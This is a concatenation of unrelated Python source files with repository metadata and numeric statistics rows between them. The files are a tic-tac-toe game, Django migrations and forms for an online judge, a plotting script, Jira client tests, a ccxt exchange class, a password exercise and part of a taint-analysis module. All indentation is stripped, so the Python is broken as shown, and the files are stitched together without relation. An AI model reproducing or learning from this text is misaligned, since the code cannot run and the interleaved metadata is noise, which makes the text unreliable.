def bdraw(number, board, player):
'''
Draw the letter ('X' or 'O') to the board
'''
for i in range(3):
for j in range(3):
if board[i][j].number == number:
if board[i][j].empty:
board[i][j].content = player.weapon
board[i][j].empty = False
return True
return False
def usermove(user, board):
'''
User's turn
'''
user.moves += 1
while True:
number = 0
try:
number = int(raw_input('Your turn [1-9]: '))
except:
print 'Invalid input'
if number >= 1 and number <= 9:
if bdraw(number, board, user):
break
def cpumove(cpu, user, board):
'''
CPU's turn
'''
cpu.moves += 1
number = getwnumber(board, cpu.weapon)
if number == -2:
number = getwnumber(board, user.weapon)
while True:
if number <= 0:
number = random.randrange(1, 10)
if bdraw(number, board, cpu):
break
number = -1
def getboard(board, weapon):
'''
Get the board contents
'''
xo = []
for i in range(3):
for j in range(3):
if not board[i][j].empty:
if weapon == 'T':
xo.append(board[i][j].number)
else:
if board[i][j].content == weapon:
xo.append(board[i][j].number)
return xo
def getwnumber(board, weapon):
'''
Check if there's a winning/breaking cell
'''
number = -2
t = getboard(board, weapon)
ex = getboard(board, 'T')
# Line 1 of 8
if isin(1, t) and isin(2, t) and not isin(3, ex):
number = 3
elif isin(2, t) and isin(3, t) and not isin(1, ex):
number = 1
elif isin(1, t) and isin(3, t) and not isin(2, ex):
number = 2
# Line 2 of 8
elif isin(4, t) and isin(5, t) and not isin(6, ex):
number = 6
elif isin(5, t) and isin(6, t) and not isin(4, ex):
number = 4
elif isin(4, t) and isin(6, t) and not isin(5, ex):
number = 5
# Line 3 of 8
elif isin(7, t) and isin(8, t) and not isin(9, ex):
number = 9
elif isin(8, t) and isin(9, t) and not isin(7, ex):
number = 7
elif isin(7, t) and isin(9, t) and not isin(8, ex):
number = 8
# Line 4 of 8
elif isin(1, t) and isin(5, t) and not isin(9, ex):
number = 9
elif isin(5, t) and isin(9, t) and not isin(1, ex):
number = 1
elif isin(1, t) and isin(9, t) and not isin(5, ex):
number = 5
# Line 5 of 8
elif isin(3, t) and isin(5, t) and not isin(7, ex):
number = 7
elif isin(5, t) and isin(7, t) and not isin(3, ex):
number = 3
elif isin(3, t) and isin(7, t) and not isin(5, ex):
number = 5
# Line 6 of 8
elif isin(1, t) and isin(4, t) and not isin(7, ex):
number = 7
elif isin(4, t) and isin(7, t) and not isin(1, ex):
number = 1
elif isin(1, t) and isin(7, t) and not isin(4, ex):
number = 4
# Line 7 of 8
elif isin(2, t) and isin(5, t) and not isin(8, ex):
number = 8
elif isin(5, t) and isin(8, t) and not isin(2, ex):
number = 2
elif isin(2, t) and isin(8, t) and not isin(5, ex):
number = 5
# Line 8 of 8
elif isin(3, t) and isin(6, t) and not isin(9, ex):
number = 9
elif isin(6, t) and isin(9, t) and not isin(3, ex):
number = 3
elif isin(3, t) and isin(9, t) and not isin(6, ex):
number = 6
return number
def isin(val, list):
'''
Checking if a value exists in a list
'''
return val in list
def checknumber(xo):
'''Internal number checking. To prevent, messy code (sort of)'''
if isin(1, xo) and isin(2, xo) and isin(3, xo) or \
isin(4, xo) and isin(5, xo) and isin(6, xo) or \
isin(7, xo) and isin(8, xo) and isin(9, xo) or \
isin(1, xo) and isin(5, xo) and isin(9, xo) or \
isin(3, xo) and isin(5, xo) and isin(7, xo) or \
isin(1, xo) and isin(4, xo) and isin(7, xo) or \
isin(2, xo) and isin(5, xo) and isin(8, xo) or \
isin(3, xo) and isin(6, xo) and isin(9, xo):
return True
return False
def checkwin(board, weapon):
'''
Check if someone won already
'''
xo = getboard(board, weapon)
if checknumber(xo):
return True
return False
def checktie(board):
'''
Check if it's a draw
'''
t = getboard(board, 'T')
if len(t) == 9:
return True
return False
def tgame(user, cpu):
'''Main Game function'''
board = boardinit()
drawboard(board)
if cpu.first:
cpumove(cpu, user, board)
drawboard(board)
while True:
usermove(user, board)
drawboard(board)
if checkwin(board, user.weapon):
user.won = True
break
if checktie(board):
break
cpumove(cpu, user, board)
drawboard(board)
if checkwin(board, cpu.weapon):
cpu.won = True
break
if checktie(board):
break
'''
Lines below is the entry point of the script
'''
if __name__ == '__main__':
main()
'''End of Code'''
| 22.688776 | 92 | 0.616483 | 1,461 | 8,894 | 3.739904 | 0.207392 | 0.035139 | 0.035139 | 0.048316 | 0.329978 | 0.291362 | 0.253843 | 0.198939 | 0.129026 | 0.110725 | 0 | 0.027269 | 0.245446 | 8,894 | 391 | 93 | 22.746803 | 0.786917 | 0.029571 | 0 | 0.304933 | 0 | 0 | 0.069312 | 0.004696 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.004484 | null | null | 0.049327 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa063c8fe24a2414d08f79391cfa01c347db328a | 655 | py | Python | sitewebapp/migrations/0014_auto_20210130_0425.py | deucaleon18/debsoc-nitdgp-website | 41bd6ade7f4af143ef34aff01848f830cc533add | [
"MIT"
] | 2 | 2020-12-05T05:34:56.000Z | 2020-12-09T10:27:43.000Z | sitewebapp/migrations/0014_auto_20210130_0425.py | deucaleon18/debsoc-nitdgp-website | 41bd6ade7f4af143ef34aff01848f830cc533add | [
"MIT"
] | 3 | 2021-06-28T16:47:23.000Z | 2021-06-28T16:48:51.000Z | sitewebapp/migrations/0014_auto_20210130_0425.py | deucaleon18/debsoc-nitdgp-website | 41bd6ade7f4af143ef34aff01848f830cc533add | [
"MIT"
] | 9 | 2021-01-29T17:06:30.000Z | 2021-08-21T18:23:26.000Z | # Generated by Django 2.2.15 on 2021-01-29 22:55
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('sitewebapp', '0013_auto_20210130_0409'),
]
operations = [
migrations.RemoveField(
model_name='auditionrounds',
name='candidate',
),
migrations.AddField(
model_name='auditionrounds',
name='candidate',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='candidates', to='sitewebapp.Candidates'),
),
]
| 27.291667 | 159 | 0.638168 | 68 | 655 | 6.044118 | 0.617647 | 0.058394 | 0.068127 | 0.107056 | 0.175182 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064777 | 0.245802 | 655 | 23 | 160 | 28.478261 | 0.767206 | 0.070229 | 0 | 0.352941 | 1 | 0 | 0.181219 | 0.072488 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.117647 | 0 | 0.294118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa07eb294a968be138419270910fe3769b70aebc | 2,464 | py | Python | scripts/plot/klt_track_length.py | raphaelchang/omni_slam_eval | 7df7d76c520c1325ac4f1a85f87b7af07d9628c3 | [
"MIT"
] | 7 | 2020-06-15T01:04:10.000Z | 2021-12-15T03:49:05.000Z | scripts/plot/klt_track_length.py | raphaelchang/omni_slam_eval | 7df7d76c520c1325ac4f1a85f87b7af07d9628c3 | [
"MIT"
] | null | null | null | scripts/plot/klt_track_length.py | raphaelchang/omni_slam_eval | 7df7d76c520c1325ac4f1a85f87b7af07d9628c3 | [
"MIT"
] | 4 | 2020-06-15T16:02:12.000Z | 2021-10-12T07:18:47.000Z | import h5py
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import pandas
import os
from parse import parse
import argparse
parser = argparse.ArgumentParser(description='Plot tracking evaluation results')
parser.add_argument('results_path', help='tracking results file or working directory')
args = parser.parse_args()
sns.set()
fovs = []
for yaml in os.listdir(args.results_path):
if not os.path.isdir(os.path.join(args.results_path, yaml)) and yaml.endswith('.yaml'):
fov = os.path.splitext(os.path.basename(yaml))[0]
fovs.append(fov)
fovs.sort(key=int)
motion_map = {'yaw': 'Yaw/pitch', 'roll': 'Roll', 'strafe_side': 'Sideways translate', 'strafe_forward': 'Forward translate', 'strafe_back': 'Backward translate', 'composite': 'Composite'}
df = pandas.DataFrame()
for motion in os.listdir(args.results_path):
if os.path.isdir(os.path.join(args.results_path, motion)):
bag_dir = os.path.join(args.results_path, motion)
for fovstr in fovs:
track_lengths = np.empty(shape=(1,0))
for filename in os.listdir(bag_dir):
if filename.split('.')[1] == fovstr and filename.endswith('.tracking.hdf5'):
results_file = os.path.join(bag_dir, filename)
with h5py.File(results_file, 'r') as f:
attrs = dict(f['attributes'].attrs.items())
rate = int(attrs['rate'])
if rate > 1:
continue
tl = f['track_lengths'][:]
track_lengths = np.hstack((track_lengths, tl[:, tl[0, :] > 2]))
file_exists = True
if file_exists:
if motion in motion_map:
motion = motion_map[motion]
df = df.append(pandas.DataFrame({'Motion': motion, 'FOV': [fovstr for i in range(len(track_lengths[0]))], 'Track lifetime (frames)': track_lengths[0, :]}))
latex = ''
for _, motion in motion_map.iteritems():
latex += motion
for fov in fovs:
latex += ' & '
rows = df.loc[(df['Motion'] == motion) & (df['FOV'] == fov)]
latex += '{} & {:.2f} & {:.2f} & {:.2f} & {:.2f} \\\\'.format(fov, rows['Track lifetime (frames)'].mean(), rows['Track lifetime (frames)'].median(), rows['Track lifetime (frames)'].quantile(0.75), rows['Track lifetime (frames)'].std())
print latex
latex = ''
| 44 | 243 | 0.590909 | 309 | 2,464 | 4.618123 | 0.349515 | 0.033637 | 0.052558 | 0.064471 | 0.115627 | 0.115627 | 0.115627 | 0.050456 | 0.050456 | 0 | 0 | 0.010377 | 0.256899 | 2,464 | 55 | 244 | 44.8 | 0.768979 | 0 | 0 | 0.040816 | 0 | 0 | 0.178571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.163265 | null | null | 0.020408 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa081249580e88b0253e91416aa676f87663a26d | 4,166 | py | Python | jtlib/test_client.py | bminard/jtlib | 0d3d83308bc4ed67bdf1732e5b0602eb8c48f53f | [
"BSD-2-Clause"
] | null | null | null | jtlib/test_client.py | bminard/jtlib | 0d3d83308bc4ed67bdf1732e5b0602eb8c48f53f | [
"BSD-2-Clause"
] | null | null | null | jtlib/test_client.py | bminard/jtlib | 0d3d83308bc4ed67bdf1732e5b0602eb8c48f53f | [
"BSD-2-Clause"
] | null | null | null | # -*-coding:Utf-8 -*
#--------------------------------------------------------------------------------
# jtlib: test_client.py
#
# jtlib module client test code.
#--------------------------------------------------------------------------------
# BSD 2-Clause License
#
# Copyright (c) 2018, Brian Minard
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#--------------------------------------------------------------------------------
import jtlib.client as client
import pytest
import re
@pytest.fixture(scope = 'session')
def timeout():
"""Time out for HTTP/HTTPS connections."""
return 5.0 # seconds; see http://docs.python-requests.org/en/master/user/quickstart/#timeouts
def test_client_without_url_argument(timeout):
"""Check client when no server URL argument is provided."""
with pytest.raises(client.InvalidUrl) as excinfo:
client.Jira(str(), timeout=timeout)
def test_client_with_invalid_url_argument(timeout):
"""Check client when an invalid server URL argument is provided."""
with pytest.raises(client.InvalidUrl) as excinfo:
client.Jira('https://www.example.com', timeout=timeout)
def test_client_without_url_argument(timeout):
"""Check client when no server URL argument is provided.
In most cases, this is going to look for a Jira server on the local host.
"""
with pytest.raises(client.InvalidUrl) as excinfo:
client.Jira(str(), timeout=timeout)
def test_client_with_invalid_url_argument(timeout):
"""Check client when an invalid server URL argument is provided."""
with pytest.raises(client.InvalidUrl) as excinfo:
client.Jira('https://www.example.com', timeout=timeout)
def test_client_with_valid_url_argument():
"""Check client when an invalid server URL argument is provided."""
client.Jira('https://jira.atlassian.com')
@pytest.fixture(scope = 'module')
def the_client():
"""Return a usable JIRA client."""
return client.Jira('https://jira.atlassian.com')
@pytest.fixture(scope = 'session')
def project_key_regex():
"""Regular expression for project key."""
return re.compile(r"""^[A-Z][A-Z]+$""") # Default project key for JIRA Server 7.1.
def test_client_projects_method(the_client, project_key_regex):
"""Check the projects method."""
projects = the_client.projects()
assert isinstance(projects, list)
for project in projects:
assert project_key_regex.match(project.key)
def test_client_issue_method(the_client):
issue = the_client.issue('CLOUD-10000')
assert 'CLOUD-10000' in issue.key
def test_client_search_method(the_client):
page_count = 0
for issue in the_client.search('PROJECT = CLOUD'):
if page_count > (client.Jira.maximum_search_results + 1): # Retrieve two pages of issues.
break
page_count += 1
assert page_count > 0, "JIRA project has too few issues to test search algorithm."
| 37.196429 | 97 | 0.694911 | 555 | 4,166 | 5.122523 | 0.363964 | 0.038692 | 0.036581 | 0.033415 | 0.365811 | 0.335561 | 0.334154 | 0.334154 | 0.334154 | 0.299683 | 0 | 0.006855 | 0.159626 | 4,166 | 111 | 98 | 37.531532 | 0.805199 | 0.544167 | 0 | 0.341463 | 0 | 0 | 0.124378 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 1 | 0.268293 | false | 0 | 0.073171 | 0 | 0.414634 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa0908d204cc1bd792f22cb281757498ea7ff6d8 | 129 | py | Python | coop/guide/context_processors.py | jalibras/coop | cb94560eb4a25eca3e241551e01eea6e3d4e3b6b | [
"Apache-2.0"
] | 1 | 2017-01-16T10:51:15.000Z | 2017-01-16T10:51:15.000Z | coop/guide/context_processors.py | jalibras/coop | cb94560eb4a25eca3e241551e01eea6e3d4e3b6b | [
"Apache-2.0"
] | null | null | null | coop/guide/context_processors.py | jalibras/coop | cb94560eb4a25eca3e241551e01eea6e3d4e3b6b | [
"Apache-2.0"
] | null | null | null |
from guide.models import Area
def nav(request):
areas = Area.objects.all()
return {
'areas':areas,
}
| 11.727273 | 30 | 0.565891 | 15 | 129 | 4.866667 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.317829 | 129 | 10 | 31 | 12.9 | 0.829545 | 0 | 0 | 0 | 0 | 0 | 0.039683 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa0bad3348ebb20b51fc55cdea73057560ae7c2d | 1,009 | py | Python | python/ccxt/async_support/bitmax.py | mariuszskon/ccxt | 13253de7346e33cd384f79abf7dfb64dcbfdc35f | [
"MIT"
] | 4 | 2021-09-24T09:18:36.000Z | 2022-03-15T16:47:09.000Z | python/ccxt/async_support/bitmax.py | mariuszskon/ccxt | 13253de7346e33cd384f79abf7dfb64dcbfdc35f | [
"MIT"
] | 1 | 2017-10-28T14:35:08.000Z | 2017-10-28T14:35:08.000Z | python/ccxt/async_support/bitmax.py | mariuszskon/ccxt | 13253de7346e33cd384f79abf7dfb64dcbfdc35f | [
"MIT"
] | 3 | 2018-10-17T09:29:29.000Z | 2019-03-12T09:18:42.000Z | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async_support.ascendex import ascendex
class bitmax(ascendex):
def describe(self):
return self.deep_extend(super(bitmax, self).describe(), {
'id': 'bitmax',
'name': 'BitMax',
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/66820319-19710880-ef49-11e9-8fbe-16be62a11992.jpg',
'api': 'https://bitmax.io',
'test': 'https://bitmax-test.io',
'www': 'https://bitmax.io',
'doc': [
'https://bitmax-exchange.github.io/bitmax-pro-api/#bitmax-pro-api-documentation',
],
'fees': 'https://bitmax.io/#/feeRate/tradeRate',
'referral': 'https://bitmax.io/#/register?inviteCode=EL6BXBQM',
},
})
| 37.37037 | 126 | 0.557978 | 108 | 1,009 | 5.194444 | 0.666667 | 0.117647 | 0.092692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05472 | 0.27552 | 1,009 | 26 | 127 | 38.807692 | 0.712722 | 0.169475 | 0 | 0 | 1 | 0.111111 | 0.442977 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.055556 | 0.055556 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa0d8ce33a090f902ad8f14cf64f48b5d4df3194 | 7,232 | py | Python | users/forms.py | henryyang42/NTHUOJ_web | b197ef8555aaf90cba176eba61da5c919dab7af6 | [
"MIT"
] | null | null | null | users/forms.py | henryyang42/NTHUOJ_web | b197ef8555aaf90cba176eba61da5c919dab7af6 | [
"MIT"
] | null | null | null | users/forms.py | henryyang42/NTHUOJ_web | b197ef8555aaf90cba176eba61da5c919dab7af6 | [
"MIT"
] | null | null | null | """
The MIT License (MIT)
Copyright (c) 2014 NTHUOJ team
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from django import forms
from threading import Thread
from users.models import User
from problem.models import Problem, Submission, SubmissionDetail, Testcase
from utils import log_info, user_info, config_info, file_info
logger = log_info.get_logger()
class CodeSubmitForm(forms.Form):
SUBMIT_PATH = config_info.get_config('path', 'submission_code_path')
LANGUAGE_CHOICE = tuple(config_info.get_config_items('compiler_option'))
BACKEND_VERSION = config_info.get_config('system_version', 'backend')
GCC_VERSION = config_info.get_config('system_version', 'gcc')
GPP_VERSION = config_info.get_config('system_version', 'gpp')
pid = forms.CharField(label='Problem ID')
language = forms.ChoiceField(choices=LANGUAGE_CHOICE, initial=Submission.CPP,
help_text="Backend: %s<br>gcc: %s<br>g++: %s"
% (BACKEND_VERSION, GCC_VERSION, GPP_VERSION))
code = forms.CharField(max_length=40 * 1024,
widget=forms.Textarea(attrs={'id': 'code_editor'}))
def clean_pid(self):
pid = self.cleaned_data['pid']
if not unicode(pid).isnumeric():
raise forms.ValidationError("Problem ID must be a number")
try:
problem = Problem.objects.get(id=pid)
if not user_info.has_problem_auth(self.user, problem):
raise forms.ValidationError(
"You don't have permission to submit that problem")
except Problem.DoesNotExist:
logger.warning('Pid %s doe not exist' % pid)
raise forms.ValidationError('Problem of this pid does not exist')
return pid
def submit(self):
pid = self.cleaned_data['pid']
code = self.cleaned_data['code']
language = self.cleaned_data['language']
problem = Problem.objects.get(id=pid)
problem.total_submission += 1
problem.save()
submission = Submission.objects.create(
user=self.user,
problem=problem,
language=language)
try:
filename = '%s.%s' % (
submission.id, file_info.get_extension(submission.language))
f = open('%s%s' % (self.SUBMIT_PATH, filename), 'w')
f.write(code.encode('utf-8'))
f.close()
except IOError:
logger.warning('Sid %s fail to save code' % submission.id)
if problem.judge_source == Problem.OTHER:
# Send to other judge
pass
def __init__(self, *args, **kwargs):
self.user = kwargs.pop('user', User())
super(CodeSubmitForm, self).__init__(*args, **kwargs)
class UserProfileForm(forms.ModelForm):
"""A form for updating user's profile. Includes all the required
fields, plus a repeated password."""
username = forms.CharField(label='Username',
widget=forms.TextInput(attrs={'readonly': True}))
email = forms.EmailField(label='Email')
theme = forms.ChoiceField(label='Theme', choices=User.THEME_CHOICE)
password1 = forms.CharField(label='Password', required=False,
widget=forms.PasswordInput())
password2 = forms.CharField(label='Password Confirmation', required=False,
widget=forms.PasswordInput())
class Meta:
model = User
fields = ('username', 'email', 'theme', 'password1', 'password2')
def clean_username(self):
# username is primary key, should not be changed
instance = getattr(self, 'instance', None)
if instance and instance.pk:
return instance.username
else:
return self.cleaned_data['username']
def clean_password2(self):
# Check that the two password entries match
password1 = self.cleaned_data.get("password1")
password2 = self.cleaned_data.get("password2")
if password1 and password2 and password1 != password2:
raise forms.ValidationError("Passwords don't match")
if (not password1) != (not password2):
raise forms.ValidationError("Passwords can't be empty")
return password2
def save(self):
if self.cleaned_data["password1"]:
self.instance.set_password(self.cleaned_data["password1"])
self.instance.save()
return self.instance
class UserLevelForm(forms.ModelForm):
"""A form for updating user's userlevel."""
def __init__(self, *args, **kwargs):
request_user = kwargs.pop('request_user', User())
super(UserLevelForm, self).__init__(*args, **kwargs)
self.fields['user_level'].label = 'User Level'
# Admin can have all choices, which is the default
if request_user.has_admin_auth():
return
# Judge can only promote a user to these levels
if request_user.has_judge_auth():
self.fields['user_level'].choices = (
(User.SUB_JUDGE, 'Sub-judge'), (User.USER, 'User'))
class Meta:
model = User
fields = ('user_level',)
def is_valid(self, user):
# run the parent validation first
valid = super(UserLevelForm, self).is_valid()
# we're done now if not valid
if not valid:
return valid
# admin can change user to all levels
if user.has_admin_auth():
return True
# judge can change user to sub-judge, user
user_level = self.cleaned_data['user_level']
if user.has_judge_auth() and \
(user_level == User.SUB_JUDGE or user_level == User.USER):
return True
return False
class UserForgetPasswordForm(forms.Form):
username = forms.CharField()
email = forms.EmailField()
def clean_email(self):
# Check that if username and email match or not
username = self.cleaned_data['username']
email = self.cleaned_data['email']
if username and email and User.objects.filter(username=username, email=email):
return email
raise forms.ValidationError("Username and Email don't match")
| 39.304348 | 86 | 0.648921 | 891 | 7,232 | 5.154882 | 0.306397 | 0.028739 | 0.03919 | 0.020684 | 0.143915 | 0.079904 | 0.040714 | 0.015241 | 0 | 0 | 0 | 0.005568 | 0.254978 | 7,232 | 183 | 87 | 39.519126 | 0.846882 | 0.221239 | 0 | 0.134454 | 0 | 0 | 0.115337 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.07563 | false | 0.142857 | 0.042017 | 0 | 0.386555 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
aa110cd2edc58ec667902045505d003d64be93a9 | 1,067 | py | Python | pset_challenging_ext/exercises/p18.py | mottaquikarim/pydev-psets | 9749e0d216ee0a5c586d0d3013ef481cc21dee27 | [
"MIT"
] | 5 | 2019-04-08T20:05:37.000Z | 2019-12-04T20:48:45.000Z | pset_challenging_ext/exercises/p18.py | mottaquikarim/pydev-psets | 9749e0d216ee0a5c586d0d3013ef481cc21dee27 | [
"MIT"
] | 8 | 2019-04-15T15:16:05.000Z | 2022-02-12T10:33:32.000Z | pset_challenging_ext/exercises/p18.py | mottaquikarim/pydev-psets | 9749e0d216ee0a5c586d0d3013ef481cc21dee27 | [
"MIT"
] | 2 | 2019-04-10T00:14:42.000Z | 2020-02-26T20:35:21.000Z | """
A website requires the users to input username and password to register. Write a program to check the validity of password input by users.
"""
"""Question 18
Level 3
Question:
A website requires the users to input username and password to register. Write a program to check the validity of password input by users.
Following are the criteria for checking the password:
1. At least 1 letter between [a-z]
2. At least 1 number between [0-9]
1. At least 1 letter between [A-Z]
3. At least 1 character from [$#@]
4. Minimum length of transaction password: 6
5. Maximum length of transaction password: 12
Your program should accept a sequence of comma separated passwords and will check them according to the above criteria. Passwords that match the criteria are to be printed, each separated by a comma.
Example
If the following passwords are given as input to the program:
ABd1234@1,a F1#,2w3E*,2We3345
Then, the output of the program should be:
ABd1234@1
Hints:
In case of input data being supplied to the question, it should be assumed to be a console input.
""" | 42.68 | 199 | 0.776007 | 186 | 1,067 | 4.451613 | 0.435484 | 0.033816 | 0.038647 | 0.045894 | 0.330918 | 0.330918 | 0.330918 | 0.330918 | 0.272947 | 0.272947 | 0 | 0.040724 | 0.171509 | 1,067 | 25 | 200 | 42.68 | 0.895928 | 0.129335 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa11a5a6d1a64b23db22e2fa37320c9cd8481f08 | 14,561 | py | Python | tool/taint_analysis/summary_functions.py | cpbscholten/karonte | b989f7dfe9dbe002dd0dc4c4e5b0293dde61ae72 | [
"BSD-2-Clause"
] | 294 | 2019-11-14T13:14:55.000Z | 2022-03-22T08:28:56.000Z | tool/taint_analysis/summary_functions.py | cpbscholten/karonte | b989f7dfe9dbe002dd0dc4c4e5b0293dde61ae72 | [
"BSD-2-Clause"
] | 17 | 2019-12-23T09:32:00.000Z | 2022-03-17T20:00:13.000Z | tool/taint_analysis/summary_functions.py | cpbscholten/karonte | b989f7dfe9dbe002dd0dc4c4e5b0293dde61ae72 | [
"BSD-2-Clause"
] | 50 | 2019-11-25T02:27:04.000Z | 2021-12-10T04:46:26.000Z | """
Though karonte relies on angr's sim procedures, sometimes these add in the current state some constraints to make the
used analysis faster. For example, if a malloc has an unconstrained size, angr add the constraint
size == angr-defined.MAX_SIZE. Though this makes the analysis faster, it makes impossible to reason about the maximum
buffer sizes (as needed by karonte).
In this module we wrap sim procedures to avoid them to add such constraints.
Note however, that the semantic of an expression might get lost.
Eg. strlen(taint_x) = taint_y, taint_y is an unconstrained variable
"""
from taint_analysis.coretaint import *
def _get_function_name(addr, p):
"""
Return a function name
:param addr: function address
:param p: angr project
:return: function name
"""
return p.loader.find_plt_stub_name(addr)
def source_dummy(*_, **__):
pass
def memcmp_unsized(_core, _, plt_path):
"""
memcmp-like unsized (e.g., strlen) function summary
:param _core: core taint engine
:param _: not used
:param plt_path: path to the plt (i.e., call_site.step())
:return: None
"""
p = _core.p
dst_reg = arg_reg_name(p, 0)
src_reg = arg_reg_name(p, 1)
b1 = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, dst_reg))
b2 = _core.safe_load(plt_path, getattr(plt_path.active[0].regs, src_reg))
if not _core.is_tainted(b1, plt_path):
b1 = None
if not _core.is_tainted(b2, plt_path):
b2 = None
# if either of the two is not tainted, we untaint the other
if b1 is not None and b2 is None:
_core.do_recursive_untaint(b1, plt_path)
elif b2 is not None and b1 is None:
_core.do_recursive_untaint(b2, plt_path)
# step into it
plt_path.step()
assert _core.p.is_hooked(plt_path.active[0].addr), "memcmp_unsized: Summary function relies on angr's " \
"sim procedure, add option use_sim_procedures to the loader"
plt_path.step()
def memcmp_sized(_core, _, plt_path):
"""
memcmp-like sized (e.g., memcmp) function summary
:param _core: core taint engine
